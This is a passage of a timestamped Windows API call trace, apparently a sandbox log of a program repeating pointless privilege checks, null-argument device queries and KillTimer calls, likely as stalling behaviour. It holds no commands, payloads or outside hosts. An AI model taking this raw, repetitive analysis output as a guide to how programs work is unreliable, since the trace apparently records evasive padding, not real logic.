returned 0xfffffffe [0085.242] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.243] GetLastError () returned 0x3f0 [0085.243] GetCurrentProcess () returned 0xffffffff [0085.243] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.243] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.243] SetLastError (dwErrCode=0x522) [0085.243] CloseHandle (hObject=0x114) returned 1 [0085.243] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.243] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.243] GetLastError () returned 0x578 [0085.243] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.243] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.243] GetCurrentThread () returned 0xfffffffe [0085.243] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.243] GetLastError () returned 0x3f0 [0085.243] GetCurrentProcess () returned 0xffffffff [0085.243] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.243] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.243] SetLastError (dwErrCode=0x522) [0085.243] CloseHandle (hObject=0x114) returned 1 [0085.243] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.243] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.243] GetLastError () returned 0x578 [0085.243] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.243] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.243] GetCurrentThread () returned 0xfffffffe [0085.243] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.243] GetLastError () returned 0x3f0 [0085.243] GetCurrentProcess () returned 0xffffffff [0085.243] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.243] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.243] SetLastError (dwErrCode=0x522) [0085.243] CloseHandle (hObject=0x114) returned 1 [0085.243] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.243] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.243] GetLastError () returned 0x578 [0085.243] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.243] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.243] GetCurrentThread () returned 0xfffffffe [0085.244] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.244] GetLastError () returned 0x3f0 [0085.244] GetCurrentProcess () returned 0xffffffff [0085.244] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.244] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.244] SetLastError (dwErrCode=0x522) [0085.244] CloseHandle (hObject=0x114) returned 1 [0085.244] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.244] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.244] GetLastError () returned 0x578 [0085.244] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.244] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.244] GetCurrentThread () returned 0xfffffffe [0085.244] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.244] GetLastError () returned 0x3f0 [0085.244] GetCurrentProcess () returned 0xffffffff [0085.244] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.244] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.244] SetLastError (dwErrCode=0x522) [0085.244] CloseHandle (hObject=0x114) returned 1 [0085.244] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.244] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.244] GetLastError () returned 0x578 [0085.244] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.244] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.244] GetCurrentThread () returned 0xfffffffe [0085.244] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.244] GetLastError () returned 0x3f0 [0085.244] GetCurrentProcess () returned 0xffffffff [0085.244] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.244] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.244] SetLastError (dwErrCode=0x522) [0085.244] CloseHandle (hObject=0x114) returned 1 [0085.244] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.244] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.244] GetLastError () returned 0x578 [0085.244] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.244] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.245] GetCurrentThread () returned 0xfffffffe [0085.245] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.245] GetLastError () returned 0x3f0 [0085.245] GetCurrentProcess () returned 0xffffffff [0085.245] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.245] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.245] SetLastError (dwErrCode=0x522) [0085.245] CloseHandle (hObject=0x114) returned 1 [0085.245] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.245] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.245] GetLastError () returned 0x578 [0085.245] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.245] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.245] GetCurrentThread () returned 0xfffffffe [0085.245] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.245] GetLastError () returned 0x3f0 [0085.245] GetCurrentProcess () returned 0xffffffff [0085.245] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.245] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.245] SetLastError (dwErrCode=0x522) [0085.245] CloseHandle (hObject=0x114) returned 1 [0085.245] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.245] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.245] GetLastError () returned 0x578 [0085.245] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.245] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.245] GetCurrentThread () returned 0xfffffffe [0085.245] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.245] GetLastError () returned 0x3f0 [0085.245] GetCurrentProcess () returned 0xffffffff [0085.245] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.245] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.245] SetLastError (dwErrCode=0x522) [0085.245] CloseHandle (hObject=0x114) returned 1 [0085.245] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.245] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.245] GetLastError () returned 0x578 [0085.245] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.246] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.246] GetCurrentThread () returned 0xfffffffe [0085.246] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.246] GetLastError () returned 0x3f0 [0085.246] GetCurrentProcess () returned 0xffffffff [0085.246] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.246] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.246] SetLastError (dwErrCode=0x522) [0085.246] CloseHandle (hObject=0x114) returned 1 [0085.246] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.246] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.246] GetLastError () returned 0x578 [0085.246] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.246] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.246] GetCurrentThread () returned 0xfffffffe [0085.246] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.246] GetLastError () returned 0x3f0 [0085.246] GetCurrentProcess () returned 0xffffffff [0085.246] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.246] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.246] SetLastError (dwErrCode=0x522) [0085.246] CloseHandle (hObject=0x114) returned 1 [0085.246] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.246] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.246] GetLastError () returned 0x578 [0085.246] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.246] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.246] GetCurrentThread () returned 0xfffffffe [0085.246] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.246] GetLastError () returned 0x3f0 [0085.246] GetCurrentProcess () returned 0xffffffff [0085.246] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.246] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.246] SetLastError (dwErrCode=0x522) [0085.246] CloseHandle (hObject=0x114) returned 1 [0085.246] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.246] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.246] GetLastError () returned 0x578 [0085.247] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.247] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.247] GetCurrentThread () returned 0xfffffffe [0085.247] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.247] GetLastError () returned 0x3f0 [0085.247] GetCurrentProcess () returned 0xffffffff [0085.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.247] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.247] SetLastError (dwErrCode=0x522) [0085.247] CloseHandle (hObject=0x114) returned 1 [0085.247] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.247] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.247] GetLastError () returned 0x578 [0085.247] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.247] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.247] GetCurrentThread () returned 0xfffffffe [0085.247] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.247] GetLastError () returned 0x3f0 [0085.247] GetCurrentProcess () returned 0xffffffff [0085.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.247] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.247] SetLastError (dwErrCode=0x522) [0085.247] CloseHandle (hObject=0x114) returned 1 [0085.247] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.247] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.247] GetLastError () returned 0x578 [0085.247] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.247] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.247] GetCurrentThread () returned 0xfffffffe [0085.247] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.247] GetLastError () returned 0x3f0 [0085.247] GetCurrentProcess () returned 0xffffffff [0085.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.247] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.247] SetLastError (dwErrCode=0x522) [0085.247] CloseHandle (hObject=0x114) returned 1 [0085.247] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.247] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.247] GetLastError () returned 0x578 [0085.248] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.248] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.248] GetCurrentThread () returned 0xfffffffe [0085.248] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.248] GetLastError () returned 0x3f0 [0085.248] GetCurrentProcess () returned 0xffffffff [0085.248] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.248] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.248] SetLastError (dwErrCode=0x522) [0085.248] CloseHandle (hObject=0x114) returned 1 [0085.248] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.248] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.248] GetLastError () returned 0x578 [0085.248] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.248] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.248] GetCurrentThread () returned 0xfffffffe [0085.248] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.248] GetLastError () returned 0x3f0 [0085.248] GetCurrentProcess () returned 0xffffffff [0085.248] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.248] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.248] SetLastError (dwErrCode=0x522) [0085.248] CloseHandle (hObject=0x114) returned 1 [0085.248] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.248] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.248] GetLastError () returned 0x578 [0085.248] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.248] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.248] GetCurrentThread () returned 0xfffffffe [0085.248] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.248] GetLastError () returned 0x3f0 [0085.248] GetCurrentProcess () returned 0xffffffff [0085.248] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.248] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.248] SetLastError (dwErrCode=0x522) [0085.248] CloseHandle (hObject=0x114) returned 1 [0085.248] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.248] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.249] GetLastError () returned 0x578 [0085.249] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.249] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.249] GetCurrentThread () returned 0xfffffffe [0085.249] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.249] GetLastError () returned 0x3f0 [0085.249] GetCurrentProcess () returned 0xffffffff [0085.249] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.249] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.249] SetLastError (dwErrCode=0x522) [0085.249] CloseHandle (hObject=0x114) returned 1 [0085.249] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.249] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.249] GetLastError () returned 0x578 [0085.249] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.249] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.249] GetCurrentThread () returned 0xfffffffe [0085.249] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.249] GetLastError () returned 0x3f0 [0085.249] GetCurrentProcess () returned 0xffffffff [0085.249] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.249] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.249] SetLastError (dwErrCode=0x522) [0085.249] CloseHandle (hObject=0x114) returned 1 [0085.249] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.249] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.249] GetLastError () returned 0x578 [0085.249] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.249] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.249] GetCurrentThread () returned 0xfffffffe [0085.249] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.249] GetLastError () returned 0x3f0 [0085.249] GetCurrentProcess () returned 0xffffffff [0085.249] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.249] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.249] SetLastError (dwErrCode=0x522) [0085.249] CloseHandle (hObject=0x114) returned 1 [0085.250] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.250] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.250] GetLastError () returned 0x578 [0085.250] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.250] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.384] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 